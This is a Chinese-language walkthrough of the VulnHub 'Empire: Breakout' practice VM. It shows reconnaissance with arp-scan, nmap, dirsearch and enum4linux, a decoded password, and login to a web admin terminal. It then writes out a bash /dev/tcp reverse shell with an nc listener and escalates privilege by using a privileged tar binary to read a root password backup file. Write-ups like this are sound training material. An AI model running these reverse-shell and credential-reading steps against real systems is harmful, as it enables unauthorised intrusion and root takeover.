环境搭建
下载地址:
#镜像地址
https://download.vulnhub.com/empire/02-Breakout.zip
#虚拟机下载地址
https://www.virtualbox.org/ (选择适合自己的版本下载)
PS:因为解压得到的.ova格式的虚拟镜像文件,所以使用virtualbox虚拟机比vmware虚拟机要要稳定,防止出现网络报错或者系统报错
信息收集
① 常规扫描
扫描靶机IP
arp-scan -l
扫描在同一网段上存活主机,可以发现我们的靶机,并确认它的mac地址
扫描开放端口
nmap -sV -A 10.0.2.13
可以看到开放了以上端口 80,139,445,10000,20000。先记录
访问80端口
显示Apache服务页面,右键查看源码(这种靶机一般都要查看一下页面源码,有时候会有想不到的惊喜)
在源码页面底下发现了一串密文,观察格式为Ook加密的密文。使用在线网址解密(https://www.cachesleuth.com/)得到密文
.2uqPEfj3D<P'a-3
扫描目录
dirsearch -u http://10.0.2.13
访问一下这个目录,发现知识Apache的默认配置目录,没有任何利用价值。
② 访问10000和20000端口
10000端口
20000端口
注意,网站搭建采用了ssl进行搭建,直接使用IP+端口访问不成功,需要在前面加上https协议前缀方能访问成功。
可以看出是两个登录框,暂时搁置,后续不行再进行爆破利用。
③ smb服务爆破
前面nmap扫描中扫描到了该服务器开放了smb服务,所以尝试对smb服务进行爆破尝试获取信息。
#使用工具 enum4linux
enum4linux -a 10.0.2.13
得到一个cyber用户。尝试与之前获取的密码进行拼接利用。
user : cyber
passwd : .2uqPEfj3D<P'a-3
对10000端口页面进行登录
失败
对20000端口页面进行登录
成功
左下角有一个终端功能,尝试利用。
④ 使用终端功能进行渗透
#命令
ls
cat user.txt
得到flag1
[cyber@breakout ~]$ cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
既然可以正常执行命令,那我们就进行一个反弹shell尝试
反弹shell
#分享一个好用的渗透工具合集网址
https://forum.ywhack.com/bountytips.php?
#命令
靶机终端
bash -i >& /dev/tcp/10.0.2.5/1234 0>&1
#攻击机
nc -lvp 1234
成功获取shell
⑤ 提权
ls -l #查看当前目录下文件权限
可以看出tar文件的权限为root并且cyber用户可以执行,而tar是Linux系统的一个压缩软件。后续我们可以尝试进行利用,先记录下来。
查找备份文件,看看是否会有备份密码
cd var
ls -la
cd /backup
ls -la
/var是Linux系统的备份目录,/var/backup中一般存储系统的备份文件。
可以看到.old_pass.bak执行权限为root,怀疑里面存有root的密码。
由于我们此时为cyber用户,所以我们无法直接查看.old_pass.bak文件内容,但是前文我们已经知道我们可以使用tar程序,所以我们的思路是:
① 先使用/~目录下的tar程序压缩.old_pass.bak文件
② 再解压,此时我们解压的程序就可以通过cyber用户查看。
操作
1.回到/~目录
cd ~
2.压缩
./tar -czvf 1.tar /var/backups/.old_pass.bak
3.解压
tar -xf 1.tar
4.进入/var/backups目录查看权限
cd /var/backups
3.查看权限
ls -la
可以看到权限成功修改为普通用户也可以查看.
提权获取高权限flag
#查看.old_pass.bak内容
cat .old_pass.bak
#获得高权限用户密码
cyber@breakout:~/var/backups$ cat .old_pass.bak
cat .old_pass.bak
Ts&4&YurgtRX(=~h
登录高权限用户
① su root
② 输入我们在.old_pass.bak文件获取的密码
成功登录
访问/~目录,获取root的flag
cd ~
ls
cat root.txt
成功获取root权限用户的flag
至此,我们获取了全部的两个flag,分别为
cat user.txt
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
cat rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}
成功获取root权限用户的flag